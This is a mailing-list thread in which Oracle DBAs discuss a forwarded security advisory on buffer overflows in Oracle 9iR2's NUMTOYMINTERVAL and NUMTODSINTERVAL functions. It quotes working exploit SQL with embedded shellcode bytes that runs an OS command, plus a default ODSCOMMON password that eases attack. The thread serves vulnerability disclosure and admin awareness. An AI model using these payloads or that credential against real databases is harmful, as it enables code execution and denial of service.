Funnily enough, on 9.2.0.2 on HP-UX I get this: illegal argument for function and desc NUMTOYMINTERVAL object NUMTOYMINTERVAL does not exist --- mkb <mkb125@xxxxxxxxx> wrote: > Hmmmm..... > > Oracle 9.2.0.3 on Win2K, shutdown the instance and > the > Oracle service. > > Pretty serious bug to me. > > mohammed > > --- Jared.Still@xxxxxxxxxxx wrote: > > Has anyone here heard of this? > > > > First I've seen it. Could not get the exploit to > > work on 8i or 9i, > > haven't tried 10g. > > > > It does however cause an ORA-3113. > > > > Jared > > > > ================================= > > > > The following security advisory is sent to the > > securiteam mailing list, > > and can be found at the SecuriTeam web site: > > http://www.securiteam.com > > - - promotion > > > > The SecuriTeam alerts list - Free, Accurate, > > Independent. > > > > Get your security news from a reliable source. > > http://www.securiteam.com/mailinglist.html > > > > > > - - - - - - - - - > > Oracle Database 9ir2 Interval Conversion Buffer > > Overflow > > Oracle Database Server is one of the most used > > database servers in the > > world, it was marketed as being unbreakable and > many > > people thinks that is > > one of the most secure database server in the > > market. > > > > Oracle Database Server provides two functions that > > can be used with PL/SQL > > to convert numbers to date/time intervals, these > > functions have buffer > > overflow vulnerabilities. > > Vulnerable Systems: > > * Oracle Database version 9ir2 and prior > > > > When any of these conversion functions are called > > with a long string as a > > second parameter a buffer overflow occurs. > > > > To reproduce the overflow execute the next PL/SQL: > > > SELECT NUMTOYMINTERVAL(1,'longstringhere') from > > dual; > > SELECT NUMTODSINTERVAL(1,'longstringhere') from > > dual; > > > > Any Oracle Database user can exploit this > > vulnerability because access to > > these functions can't be restricted. Exploitation > of > > this vulnerability > > allow an attacker to execute arbitrary code, also > it > > can be exploited to > > cause DOS (Denial of service) killing Oracle > server > > process. An attacker > > can complete compromise the OS and database if > > Oracle is running on > > Windows platform, because Oracle must run under > the > > local System account > > or under an administrative account. If Oracle is > > running on *nix then only > > the database could be compromised because Oracle > > runs mostly under oracle > > user which has restricted permissions. > > > > Important: Exploitation of these vulnerabilities > > becomes easy if Oracle Internet > > Directory has been deployed, because Oracle > Internet > > Directory creates a > > database user called ODSCOMMON that has a default > > password ODSCOMMON, this > > password can not be changed, so any attacker can > use > > this user to connect > > to database and exploit these vulnerabilities. > > > > Full tests on Oracle database 9ir2 under Microsoft > > Windows 2000 Server and > > Linux confirm these vulnerabilities. Versions > > running in other OS > > platforms are believed to be affected too. > Previous > > Oracle Database Server > > versions could be affected by these > vulnerabilities. > > > > > > Exploits: > > -- These exploits should work on Windows 2000 > Server > > and Windows XP, not > > tested on Windows 2003. > > -- Run any command at the end of the string > > SELECT > > > NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' > > || > > chr(59) || chr(79) || chr(150) || chr(01) || > > chr(141) || chr(68) || > > chr(36) || chr(18) || chr(80) || chr(255) || > chr(21) > > || chr(52) || chr(35) > > || chr(148) || chr(01) || chr(255) || chr(37) || > > chr(172) || chr(33) || > > chr(148) || chr(01) || chr(32)||'echo ARE YOU > SURE? > > >c:\Unbreakable.txt') > > ?FROM DUAL; > > > > SELECT > > > NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' > > || > > chr(59) || chr(79) || chr(150) || chr(01) || > > chr(141) || chr(68) || > > chr(36) || chr(18) || chr(80) || chr(255) || > chr(21) > > || chr(52) || chr(35) > > || chr(148) || chr(01) || chr(255) || chr(37) || > > chr(172) || chr(33) || > > chr(148) || chr(01) || chr(32) || 'echo ARE YOU > > SURE? > > >c:\Unbreakable.txt') ? > > > > FROM DUAL; > > > > Vendor Fix: > > Go to Oracle Metalink site, > > http://metalink.oracle.com. > > > > Vendor Contact: > > Oracle was contacted and they released a fix > without > > telling the public > > nor Ceaser anything and without issuing an alert. > > Additional Information: > > The information has been provided by Cesar. > > > ================================================================================ > > > > > > > > > > > > > > This bulletin is sent to members of the SecuriTeam > > mailing list. > > To unsubscribe from the list, send mail with an > > empty subject line and > > body to: html-list-unsubscribe@xxxxxxxxxxxxxx > > In order to subscribe to the mailing list and > > receive advisories in HTML > > format, simply forward this email to: > > html-list-subscribe@xxxxxxxxxxxxxx > > > > > ================================================================================ > > > > > > > ================================================================================ > > > > > > DISCLAIMER: > > The information in this bulletin is provided "AS > IS" > > without warranty of > > any kind. > > In no event shall we be liable for any damages > > whatsoever including > > direct, indirect, incidental, consequential, loss > of > > business profits or > > special damages. > > > > > > > === message truncated === __________________________________ Do you Yahoo!? Get better spam protection with Yahoo! Mail. http://antispam.yahoo.com/tools ---------------------------------------------------------------- Please see the official ORACLE-L FAQ: http://www.orafaq.com ---------------------------------------------------------------- To unsubscribe send email to: oracle-l-request@xxxxxxxxxxxxx put 'unsubscribe' in the subject line. -- Archives are at //www.freelists.org/archives/oracle-l/ FAQ is at //www.freelists.org/help/fom-serve/cache/1.html -----------------------------------------------------------------